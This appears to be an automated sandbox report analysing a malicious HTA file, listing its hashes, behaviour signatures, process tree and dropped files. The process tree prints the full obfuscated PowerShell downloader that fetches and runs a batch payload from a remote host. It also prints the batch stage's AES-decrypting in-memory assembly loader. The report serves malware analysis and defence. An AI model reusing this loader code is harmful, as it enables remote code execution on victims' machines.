Analysis

  • max time kernel
    118s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    17-04-2024 01:11

General

  • Target

    2522c6e717f20b29f38a73dc450a3ad748a14bbe86796429e50eaa672edd5d23.hta

  • Size

    12KB

  • MD5

    1813054fd92c59be0214e8f908d31155

  • SHA1

    3666af3fcd4dbf6d4881afb6e80841c87732569b

  • SHA256

    2522c6e717f20b29f38a73dc450a3ad748a14bbe86796429e50eaa672edd5d23

  • SHA512

    5416b8eebba6bdc80b48fb5c56e78ffa4c260e13513528022ac5f0e2f0ee5831ce3e8e55b5dbe0aadd60e782b7c69891ffd92190863aa4e218c8a5c5fa966869

  • SSDEEP

    192:whpDrcs3f1bF0VXd5uQ45pj3PxFtjQp2QYw:wgefH0lC5pTRo

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\2522c6e717f20b29f38a73dc450a3ad748a14bbe86796429e50eaa672edd5d23.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2704
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function kECMOkR($gdxSDC, $rTnOMRhfVJUY){[IO.File]::WriteAllBytes($gdxSDC, $rTnOMRhfVJUY)};function mumNyknYLgnsVYB($gdxSDC){if($gdxSDC.EndsWith((LSLyBfLILlsvQ @(74696,74750,74758,74758))) -eq $True){rundll32.exe $gdxSDC }elseif($gdxSDC.EndsWith((LSLyBfLILlsvQ @(74696,74762,74765,74699))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $gdxSDC}elseif($gdxSDC.EndsWith((LSLyBfLILlsvQ @(74696,74759,74765,74755))) -eq $True){misexec /qn /i $gdxSDC}else{Start-Process $gdxSDC}};function sSOuincqeTeMefqK($fusnPVMKKSsamabF){$pXfsSsKiwLgzgmXA = New-Object (LSLyBfLILlsvQ @(74728,74751,74766,74696,74737,74751,74748,74717,74758,74755,74751,74760,74766));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$rTnOMRhfVJUY = $pXfsSsKiwLgzgmXA.DownloadData($fusnPVMKKSsamabF);return $rTnOMRhfVJUY};function LSLyBfLILlsvQ($UyfqAHAWGDk){$PuBEDrZXHzyrm=74650;$kKrEoNdYusFnuk=$Null;foreach($FhWJmOIuouGdHGPQ in $UyfqAHAWGDk){$kKrEoNdYusFnuk+=[char]($FhWJmOIuouGdHGPQ-$PuBEDrZXHzyrm)};return $kKrEoNdYusFnuk};function BWGtGqQvhtaMVCwQIH(){$UpkpLddqWxxLFW = $env:AppData + '\';$NYgAUxsoiyj = $UpkpLddqWxxLFW + 'gogi.xlsx';If(Test-Path -Path $NYgAUxsoiyj){Invoke-Item $NYgAUxsoiyj;}Else{ $YEmOvxcFFlsialH = sSOuincqeTeMefqK (LSLyBfLILlsvQ @(74754,74766,74766,74762,74708,74697,74697,74699,74707,74702,74696,74702,74706,74696,74700,74703,74699,74696,74699,74704,74707,74708,74705,74700,74706,74705,74697,74753,74761,74753,74755,74696,74770,74758,74765,74770));kECMOkR $NYgAUxsoiyj $YEmOvxcFFlsialH;Invoke-Item $NYgAUxsoiyj;};$YJtKgLZ = $UpkpLddqWxxLFW + 'gogis.bat'; if (Test-Path -Path $YJtKgLZ){mumNyknYLgnsVYB $YJtKgLZ;}Else{ $WTNqxG = sSOuincqeTeMefqK (LSLyBfLILlsvQ @(74754,74766,74766,74762,74708,74697,74697,74699,74707,74702,74696,74702,74706,74696,74700,74703,74699,74696,74699,74704,74707,74708,74705,74700,74706,74705,74697,74753,74761,74753,74755,74765,74696,74748,74747,74766));kECMOkR $YJtKgLZ $WTNqxG;mumNyknYLgnsVYB $YJtKgLZ;};;;;}BWGtGqQvhtaMVCwQIH;
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2268
      • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
        "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
        3⤵
        • Enumerates system info in registry
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of SetWindowsHookEx
        PID:2456
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Roaming\gogis.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:308
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\gogis.bat"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1112
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\gogis.bat';$XgWC='CJCPqopJCPqyToJCPq'.Replace('JCPq', ''),'DeKEVccoKEVcmKEVcpKEVcreKEVcsKEVcsKEVc'.Replace('KEVc', ''),'GeAJwHtCAJwHurrAJwHeAJwHntAJwHProAJwHceAJwHssAJwH'.Replace('AJwH', ''),'CGqtVreGqtVateGqtVDGqtVecrGqtVypGqtVtoGqtVrGqtV'.Replace('GqtV', ''),'TrashffnsfshfforshffmshffFinshffashfflBlshffocshffkshff'.Replace('shff', ''),'LoaAcuudAcuu'.Replace('Acuu', ''),'EnPhDKtPhDKrPhDKyPoPhDKiPhDKntPhDK'.Replace('PhDK', ''),'InvjPegokejPeg'.Replace('jPeg', ''),'ChBNFcangBNFceEBNFcxtBNFcenBNFcsBNFciBNFconBNFc'.Replace('BNFc', ''),'MamJZeimJZenmJZeMomJZedumJZelemJZe'.Replace('mJZe', ''),'SDiPVplDiPViDiPVtDiPV'.Replace('DiPV', ''),'ReZkbLadLZkbLinZkbLeZkbLsZkbL'.Replace('ZkbL', ''),'FBIJjrBIJjomBBIJjaBIJjseBIJj64BIJjStrBIJjiBIJjngBIJj'.Replace('BIJj', ''),'EleFaTTmeFaTTnFaTTtAFaTTtFaTT'.Replace('FaTT', '');powershell -w hidden;function nHhmY($bfNRC){$Wqjzg=[System.Security.Cryptography.Aes]::Create();$Wqjzg.Mode=[System.Security.Cryptography.CipherMode]::CBC;$Wqjzg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$Wqjzg.Key=[System.Convert]::($XgWC[12])('0/mNfjofNmhTDWKM5pVXBX9kZTvZAJfnb+xHxm0CsMs=');$Wqjzg.IV=[System.Convert]::($XgWC[12])('mimfsJsCvsdSCjq6OJjGsw==');$mEsqN=$Wqjzg.($XgWC[3])();$cIvUt=$mEsqN.($XgWC[4])($bfNRC,0,$bfNRC.Length);$mEsqN.Dispose();$Wqjzg.Dispose();$cIvUt;}function Jxpsl($bfNRC){$DhsxW=New-Object System.IO.MemoryStream(,$bfNRC);$abuYQ=New-Object System.IO.MemoryStream;$hMgwC=New-Object System.IO.Compression.GZipStream($DhsxW,[IO.Compression.CompressionMode]::($XgWC[1]));$hMgwC.($XgWC[0])($abuYQ);$hMgwC.Dispose();$DhsxW.Dispose();$abuYQ.Dispose();$abuYQ.ToArray();}$vXkJe=[System.IO.File]::($XgWC[11])([Console]::Title);$JakZo=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 5).Substring(2))));$GFnOO=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 6).Substring(2))));[System.Reflection.Assembly]::($XgWC[5])([byte[]]$GFnOO).($XgWC[6]).($XgWC[7])($null,$null);[System.Reflection.Assembly]::($XgWC[5])([byte[]]$JakZo).($XgWC[6]).($XgWC[7])($null,$null); "
            5⤵
              PID:1924
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1444

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\09H0XO9NP4R90VZW4LHU.temp

      Filesize

      7KB

      MD5

      2b1970e53746de2d50b99b180974c5fa

      SHA1

      433deefb7aeefe483b1769d8dd822418c3646942

      SHA256

      1d7b48e596efd1afc198ad8759b81ff268d48497a835603bcb2f820de69561e2

      SHA512

      e6cc9cd4f34185b3e9022e387d0471f55f4a3802bf135add5f18bc0a51a799062a45082141326a4e2f0f0e5bcb47c29ab71bdc1b4dbea9ec731a2d666ae338e2

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      217bdfdc543378aaa947fdd913bd1d7e

      SHA1

      973430edf191a2fb3fc0dd0b44461180c87ba748

      SHA256

      f714aaa7c9e1eac325af120d297c276a659d8415eff6073dfea0e3977568a0ba

      SHA512

      a21916d550906d657dacd4e86e77853e638a207a53b80d0f156f4e8aff3cabc1fa59db3a9ec478b7a02c8bccd28c88ec64a2582de4076826ff3b4c69414c635a

    • C:\Users\Admin\AppData\Roaming\gogi.xlsx

      Filesize

      9KB

      MD5

      600c497f3fe2e8ce045dc56ee1edca75

      SHA1

      02fc342d23e3e49c9811592922beb1e4f7d3cfc1

      SHA256

      1235db2b5033bed11ce0586dabd7122f4bab90eb2a4b65a81bba8b884d9c11ed

      SHA512

      ef4a7ad833ea2d7ea0a9b618aee52849e53044d72b737c79e07563ea23d4e181ab5285cc6c7b10e9e18d019d0ea607810d2306e497f394c6ccc1814b3e305809

    • C:\Users\Admin\AppData\Roaming\gogis.bat

      Filesize

      6.9MB

      MD5

      a65e873839228c5b453d6effa5d14d16

      SHA1

      40be429e0e6b41061f3291d10e720eaebf32eda1

      SHA256

      59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951

      SHA512

      84ec1da7d5f5fe236c7fbe960b69d99ae0b6d3fe83844cd2bf3128508d39ad1de35f17dcb101e06fb25b155a806885bb5d6d095fbf3e0a3c729c678fa200f850

    • memory/1444-42-0x0000000002390000-0x00000000023D0000-memory.dmp

      Filesize

      256KB

    • memory/1444-44-0x0000000071CE0000-0x000000007228B000-memory.dmp

      Filesize

      5.7MB

    • memory/1444-47-0x0000000002390000-0x00000000023D0000-memory.dmp

      Filesize

      256KB

    • memory/1444-46-0x0000000002390000-0x00000000023D0000-memory.dmp

      Filesize

      256KB

    • memory/1444-45-0x0000000002390000-0x00000000023D0000-memory.dmp

      Filesize

      256KB

    • memory/1444-43-0x0000000002390000-0x00000000023D0000-memory.dmp

      Filesize

      256KB

    • memory/1444-41-0x0000000071CE0000-0x000000007228B000-memory.dmp

      Filesize

      5.7MB

    • memory/1444-40-0x0000000002390000-0x00000000023D0000-memory.dmp

      Filesize

      256KB

    • memory/1444-39-0x0000000071CE0000-0x000000007228B000-memory.dmp

      Filesize

      5.7MB

    • memory/2268-21-0x0000000002580000-0x00000000025C0000-memory.dmp

      Filesize

      256KB

    • memory/2268-4-0x0000000002580000-0x00000000025C0000-memory.dmp

      Filesize

      256KB

    • memory/2268-33-0x0000000072290000-0x000000007283B000-memory.dmp

      Filesize

      5.7MB

    • memory/2268-5-0x0000000002580000-0x00000000025C0000-memory.dmp

      Filesize

      256KB

    • memory/2268-2-0x0000000072290000-0x000000007283B000-memory.dmp

      Filesize

      5.7MB

    • memory/2268-3-0x0000000072290000-0x000000007283B000-memory.dmp

      Filesize

      5.7MB

    • memory/2268-20-0x0000000002580000-0x00000000025C0000-memory.dmp

      Filesize

      256KB

    • memory/2268-19-0x0000000072290000-0x000000007283B000-memory.dmp

      Filesize

      5.7MB

    • memory/2456-23-0x000000006D4AD000-0x000000006D4B8000-memory.dmp

      Filesize

      44KB

    • memory/2456-7-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2456-8-0x000000006D4AD000-0x000000006D4B8000-memory.dmp

      Filesize

      44KB

    • memory/2456-51-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2456-52-0x000000006D4AD000-0x000000006D4B8000-memory.dmp

      Filesize

      44KB